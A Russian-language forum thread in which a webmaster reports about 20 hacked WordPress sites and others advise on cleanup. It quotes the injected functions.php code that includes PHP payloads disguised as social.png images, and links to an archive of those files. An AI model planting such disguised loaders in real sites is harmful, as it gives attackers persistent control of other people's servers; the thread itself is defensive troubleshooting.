[Denis Creative]

Впервые столкнулся с таким взломом, не могу понять как и откуда.
Суть - перестал работать один сайт, зашел на хостинг, и обнаружил несколько посторонних файлов. Проверил остальные сайты и вот, что обнаружил.

В корне два файла wp-pass.php и wp-register.php (но не на всех сайтах), и в активной теме, то есть в папке themes может быть несколько тем, но только в активной теме лежит несколько файлов 2,3 или 4 якобы картинок с именами social.png, social0.png, social1.png или social2.png (на всех сайтах). На самом деле это закодированные php-файлы, чтобы открыть их достаточно изменить тип файла с png на php. Кому интересно - вот ссылка на архив с файлами _http://yadi.sk/d/jjopVmxEFa7XH
И в файле functions.php в конце добавлен такой код:

PHP код:

<?php 
if (!defined('WP_OPTION_KEY')) {
include_once 'social.png';
}

if (!defined('WP_OPTION_KEY')) {
include_once 'social0.png';
}

if (!defined('WP_OPTION_KEY')) {
include_once 'social1.png';
}

if (!defined('WP_OPTION_KEY')) {
include_once 'social2.png';
}

Файлы добавлены и обновлены все в одно время.

Не могу понять откуда пошел взлом, и что с ним делать, как защитить сайты, раньше сталкивался с подобными вещами, но проблемы были или в плагинах или в шаблонах, сейчас вроде бы все чисто, плагины проверенные и обновляются.
Возможна проблема в том, что есть сайты, в которых движок не обновляется, лежат старые плагины и темы.

Кто, что может подсказать, как защитить сайты?

[3s777]

Вполне могли через уязвимость в одном сайте ломануть все остальные.
Сначала вычистите все сайты, или восстановитесь из бэкапа. Затем обновляйте все движки и плагины до последней версии, меняйте все пароли, ставьте дополнительные плагины защиты.
На всякий случай проверьте другие сайты на вашем хостинге, если он у вас виртуальный. А то всякое бывает. Такое у меня было Уязвимость сервера или как доказать хостеру, что он не прав.

[Dolmatov]

А хостер кто?
Недавно кто то мучился со взломами, оказалось у хостера дыра.

[Denis Creative]

Как бы еще вычислить, где уязвимость, около 20 сайтов... Буду вручную удалять все лишнее и обновлять..

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

[Dolmatov]

Denis Creative, По логам попробуйте посмотреть.

[3s777]

Denis Creative, если есть возможность, то лучше восстанавливайте из бэкапа на момент когда сайт еще не был заражен, и сразу же обновляйте и меняйте пароли, так надежнее будет
Просто если чистить все вручную, то можно пропустить нежелательные файлы, а они в свою очередь обеспечат взломщику новую дыру.

[Denis Creative]

Обнаружил в некоторых сайтах после переноса с Денвера остались незаполненные ключи

PHP код:

define('AUTH_KEY',         'впишите сюда уникальную фразу');
define('SECURE_AUTH_KEY',  'впишите сюда уникальную фразу');
define('LOGGED_IN_KEY',    'впишите сюда уникальную фразу');
define('NONCE_KEY',        'впишите сюда уникальную фразу');
define('AUTH_SALT',        'впишите сюда уникальную фразу');
define('SECURE_AUTH_SALT', 'впишите сюда уникальную фразу');
define('LOGGED_IN_SALT',   'впишите сюда уникальную фразу');
define('NONCE_SALT',       'впишите сюда уникальную фразу'); 


Может ли это быть уязвимостью?


После удаления этих файлов картинок и чистки functions.php, они восстанавливаются через время, так что нужно сначала найти источник заражения...

[KipiaSoft]

и чистки functions.php

просто почистить мало, нужно права на файлы выставлять, запрещающие запись в файл - 444 или 555 в зависимости от назначение файла

[Gnoma]

Denis Creative, надо делать бекап прошлым числом (тем, в котором еще сайты живы были) + внимательно выставлять права + менять все-все пароли.

[akrustam]

По логам попробуйте посмотреть.

Часто чистят.